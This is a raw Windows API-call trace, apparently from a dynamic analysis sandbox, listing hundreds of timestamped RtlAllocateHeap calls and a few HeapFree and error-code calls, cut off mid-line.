[0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d5f0 [0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3cff0 [0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d710 [0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d080 [0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3da70 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3da10 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d0e0 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d620 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d290 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3cfc0 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3da40 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d1a0 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d110 [0084.231] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d830 [0084.232] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d890 [0084.233] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d3e0 [0084.233] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d410 [0084.233] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d9b0 [0084.234] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d140 [0084.234] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d170 [0084.235] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d650 [0084.235] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d2c0 [0084.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d2f0 [0084.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d8c0 [0084.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d680 [0084.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d8f0 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d4d0 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d500 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d920 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3cf90 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d320 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e3a0 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dcb0 [0084.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e040 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3de90 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e670 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dec0 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e280 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3def0 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dda0 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e370 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e190 [0084.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e3d0 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e5e0 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3de30 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3df20 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e400 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e2e0 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e700 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e4c0 [0084.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x2000) returned 0x22b36a696c0 [0084.240] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3ad10 | out: hHeap=0x22b349a0000) returned 1 [0084.240] GetLastError () returned 0xcb [0084.240] SetLastError (dwErrCode=0xcb) [0084.240] GetLastError () returned 0xcb [0084.240] SetLastError (dwErrCode=0xcb) [0084.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dd70 [0084.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e610 [0084.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e460 [0084.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e6a0 [0084.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3df80 [0084.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e1f0 [0084.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e430 [0084.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3df50 [0084.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e070 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dfb0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ddd0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e0a0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e0d0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dce0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e6d0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e490 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e1c0 [0084.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e220 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e4f0 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3db30 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dfe0 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dc20 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e160 [0084.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e310 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e2b0 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e250 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e340 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e5b0 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e520 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e010 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e640 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3db60 [0084.244] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e550 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dd10 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e100 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e580 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3db90 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dbc0 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dbf0 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dc50 [0084.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e130 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dd40 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3dc80 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3de00 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3de60 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e910 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e760 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eaf0 [0084.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f120 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eee0 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e730 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ebb0 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e940 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ea60 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ec40 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f210 [0084.247] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e880 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ef70 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eb80 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ed60 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ebe0 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ea30 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ed30 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ea90 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eb20 [0084.248] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e850 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e9a0 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e790 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ed90 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eb50 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e7f0 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f240 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e8b0 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e8e0 [0084.249] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f300 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e970 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eac0 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f0f0 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ee20 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ec10 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f1e0 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ef10 [0084.250] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3efd0 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ec70 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3edf0 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3efa0 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ee50 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e7c0 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e9d0 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f270 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3e820 [0084.251] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ea00 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3edc0 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eca0 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ecd0 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ee80 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ed00 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f150 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f2a0 [0084.252] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3eeb0 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ef40 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f000 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f180 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f030 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f060 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f090 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f0c0 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f1b0 [0084.253] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f2d0 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f3c0 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f4e0 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f570 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f510 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f5a0 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f5d0 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f600 [0084.254] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f3f0 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f630 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f420 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f330 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f450 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f660 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f540 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f690 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f360 [0084.255] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f390 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f480 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3f4b0 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c300 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c210 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3be50 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bd00 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bfa0 [0084.256] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ba90 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b970 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b820 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bc10 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c240 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c090 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bf10 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bcd0 [0084.257] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bd30 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c1b0 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c150 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c1e0 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bac0 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b9a0 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ba60 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bd60 [0084.258] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b7f0 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bca0 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c180 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b730 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bf40 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3baf0 [0084.266] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ba30 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bdc0 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c0f0 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bc40 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c030 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b850 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b790 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bdf0 [0084.267] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c270 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b7c0 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bd90 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c060 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b880 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3be80 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bbb0 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c2a0 [0084.268] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bf70 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bfd0 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c2d0 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3beb0 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3be20 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b8b0 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b8e0 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b760 [0084.269] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b910 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b9d0 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3b940 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bee0 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3ba00 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bb20 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3c000 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bb50 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3bb80 [0084.270] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 